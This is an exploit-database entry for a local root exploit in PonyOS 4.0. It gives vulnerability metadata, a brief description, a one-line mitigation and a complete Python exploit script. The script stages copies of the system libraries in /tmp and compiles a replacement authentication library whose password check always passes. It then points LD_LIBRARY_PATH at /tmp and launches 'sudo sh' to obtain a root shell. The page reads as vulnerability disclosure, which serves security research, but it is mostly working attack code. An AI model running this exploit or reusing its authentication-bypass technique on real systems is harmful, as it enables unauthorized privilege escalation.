Dynamic Linker Exploit for PonyOS 4.0

vendor:

PonyOS

by:

fluttershy

8,8

CVSS

HIGH

Environment Variable Injection

CWE

Product Name: PonyOS

Affected Version From: PonyOS 4.0

Affected Version To: PonyOS 4.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2020

Dynamic Linker Exploit for PonyOS 4.0

PonyOS 4.0 has added several improvements over previous releases including support for setuid binaries and dynamic libraries. The run-time linker does not sanitize environment variables when running setuid files allowing for local root exploitation through manipulated LD_LIBRARY_PATH. Requires build-essential installed to compile the malicious library.

Mitigation:

Sanitize environment variables when running setuid files.

Source

Exploit-DB raw data:

#!/usr/bin/python
#PonyOS 4.0 has added several improvements over previous releases
#including support for setuid binaries and dynamic libraries. The
#run-time linker does not sanitize environment variables when 
#running setuid files allowing for local root exploitation through
#manipulated LD_LIBRARY_PATH. Requires build-essential installed
#to compile the malicious library.
import shutil
import os

if __name__=="__main__":
    print("[+] fluttershy - dynamic linker exploit for ponyos 4.0")
    shutil.copyfile("/usr/lib/libc.so","/tmp/libc.so")
    shutil.copyfile("/usr/lib/libm.so","/tmp/libm.so")
    shutil.copyfile("/usr/lib/libpng15.so","/tmp/libpng15.so")
    shutil.copyfile("/usr/lib/libtoaru-graphics.so","/tmp/libtoaru-graphics.so")
    shutil.copyfile("/usr/lib/libtoaru-kbd.so","/tmp/libtoaru-kbd.so")
    shutil.copyfile("/usr/lib/libtoaru-rline.so","/tmp/libtoaru-rline.so")
    shutil.copyfile("/usr/lib/libtoaru-list.so","/tmp/libtoaru-list.so")
    shutil.copyfile("/usr/lib/libtoaru-sha2.so","/tmp/libtoaru-sha2.so")
    shutil.copyfile("/usr/lib/libtoaru-termemu.so","/tmp/libtoaru-termemu.so")
    shutil.copyfile("/usr/lib/libz.so", "/tmp/libz.so")
    fd = open("/tmp/lib.c","w")
    fd.write("#include <stdio.h>\n#include <stdlib.h>\n\n")
    fd.write("void toaru_auth_check_pass(char* username, char* password){\n")
    fd.write("\tprintf(\"[+] pony smash!\\n\");\n}\n")
    fd.close()
    os.system("gcc -fpic -c /tmp/lib.c")
    os.system("gcc -shared -o /tmp/libtoaru-toaru_auth.so /tmp/lib.o")
    os.environ["LD_LIBRARY_PATH"] = "/tmp"
    os.system("sudo sh")